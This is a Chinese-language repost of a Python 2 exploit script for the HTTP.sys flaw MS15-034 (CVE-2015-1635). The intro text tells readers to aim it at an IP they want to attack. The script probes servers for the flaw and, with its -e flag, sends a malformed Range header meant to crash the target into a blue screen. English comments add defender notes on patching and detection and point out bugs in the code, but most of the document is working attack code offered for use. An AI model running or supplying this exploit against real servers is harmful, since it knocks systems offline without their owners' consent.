http-cve2015-1635 EXP HTTP.sys 远程执行代码(CVE-2015-1635 MS15-034)
本执行代码转载自网络,来源地址:http://www.securitysift.com/an-analysis-of-ms15-034/
本人对其进行了汉化,如果看着汉化版不顺眼,可以自己去用原版。
http-vuln-cve2015-1635.nse HTTP.sys 远程执行代码exp
网上的试验了几个都不好使,不知道为什么,但是下面这个本人亲测,绝对可以用的 POC。
把下方代码保存为 xxxx.py 试用方法: xxxx.py http://ip(换成你要攻击的IP) -e (使用这个参数表示开始攻击。)
#!/usr/bin/python
#coding=utf8
# Python 2 script (print statements, urllib2): it will not run unmodified on Python 3.
#
# Defender notes: the condition probed here is MS15-034 / CVE-2015-1635 in HTTP.sys.
# The remedy is the MS15-034 security update; Microsoft's documented workaround at the
# time was disabling IIS kernel caching. Requests whose Range header ends in
# 18446744073709551615 (as built in main() below) are a usable detection signature.
import urllib2
import sys
import argparse
import socket

''' get cl args '''
def getArgs():
    """Parse the command line: positional target plus -p/--path, -e/--exploit, -r/--range.

    Returns the argparse Namespace; defaults are visible in the add_argument calls.
    """
    parser = argparse.ArgumentParser( prog="ms15_034.py", formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50), epilog= "这个脚本将测试存在或利用DOS状态ms15_034")
    parser.add_argument("target", help="Target Host in the form of http://[host]:[port] -- specify port only if not 80" )
    # Path of a static resource on the target; the help text names the Windows 7 and
    # Windows Server 2012 defaults as translated from the upstream script.
    parser.add_argument("-p", "--path", default="/welcome.png", help="资源在目标服务器上的路径 默认 [default = /welcome.png] 上面是win7的 /iis-85.png 是win2012的")
    # store_true flag: when set, main() overrides the Range value (see below).
    parser.add_argument("-e", "--exploit", action="store_true", default=False, help="加上此参数则表示攻击此服务器 默认 [default = False]")
    parser.add_argument("-r", "--range", default="0-18446744073709551615", help="修改头部代码 默认 [default=0-18446744073709551615]; 这可能会导致对方服务器蓝屏!!!")
    args = parser.parse_args()
    return args

''' make the evil request and examine response to determine vulnerability '''
def evilRequest(req, exploit):
    """Send `req` once and classify the outcome by matching the exception text.

    A successful read returns the response body; every error path returns "".
    Classification relies on substring matches against str(sys.exc_info()[1]), so
    it is only as reliable as the wording of urllib2/socket error messages.
    """
    res = ""
    if exploit:
        print "[*] 尝试测试中..."
    try:
        res = urllib2.urlopen(req).read() # make request
        if exploit:
            print "[*] 无法解析响应,检查目标,请查看是否成功!"
        else:
            print "[*] 请求成功,可能不易受攻击" # no error returned: the target is probably not vulnerable
    # Bare except: also swallows KeyboardInterrupt and SystemExit, so Ctrl-C during a
    # hung request is reported as an "unknown" outcome instead of stopping the script.
    except:
        if "Requested Range Not Satisfiable" in str(sys.exc_info()[1]): # response if target is unpatched
            print "[*] 恭喜恭喜它有漏洞呦!!!"
        elif "The Request has an invalid header name" in str(sys.exc_info()[1]): # typical response if target is patched
            # NOTE(review): this message reads as "target appeared"; given the comment
            # above it is presumably a mistranslation of "target likely patched".
            print "[*] 目标出现了"
        elif (("Connection reset by peer" in str(sys.exc_info()[1])) or ("forcibly closed" in str(sys.exc_info()[1]))) and (exploit): # often DoS exploit not successful on first attempt
            print "[*] 连接复位,重新尝试利用..."
            # Unbounded recursion: there is no retry counter, so a host that keeps
            # resetting connections drives this until Python's recursion limit is hit.
            res = evilRequest(req, exploit)
        elif ("timed out" in str(sys.exc_info()[1])) and (exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
            print "[*] 请求超时,可能成功了呦。"
        elif ("timed out" in str(sys.exc_info()[1])) and (not exploit): # prevent loop after DoS function (used w/ socket timeout variable in main)
            print "[*] 请求超时,但利用开关不使用。你有没修改文件头大小?"
        else:
            print "[*] 不能确定目标是否有漏洞" # any other response means vuln unknown
            print "\t[+] Response: %s" % str(sys.exc_info()[1]) # print server response
    return res

''' main '''
def main():
    """Print the banner, build the Range request from the parsed arguments and send it."""
    print
    print '============================================================================='
    print '| ms15_034.py - Test and DoS exploit |'
    print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
    print '| 虾米汉化 URL地址:https://woj.app/ |'
    print '=============================================================================\n'
    args = getArgs()
    target = args.target # target server
    path = args.path # path to resource to retrieve on target server
    range = args.range # value of Range header (shadows the builtin range(); it is not called in this function)
    exploit = args.exploit # boolean (exploit DoS or not)
    if exploit:
        # With -e the -r/--range value is silently discarded in favour of this constant.
        range = "18-18446744073709551615" # evil range if requesting welcome.png
        # may need to change if requesting different resource (use range arg instead)
    print "[*] Making request to " + target
    print "\t[+] Target path: " + path
    print "\t[+] Range Header: " + range
    print "\t[+] Exploit (DoS)?: " + str(exploit)
    print
    socket.setdefaulttimeout(10) # timeout the connection in event of DoS/reboot
    # target and path are concatenated verbatim; no validation that target is a URL.
    req = urllib2.Request( "%s%s"%(target,path), headers={ "Range" : "bytes=%s" % range }) # format request
    res = evilRequest(req, exploit) # make request
    print

if __name__ == '__main__':
    main()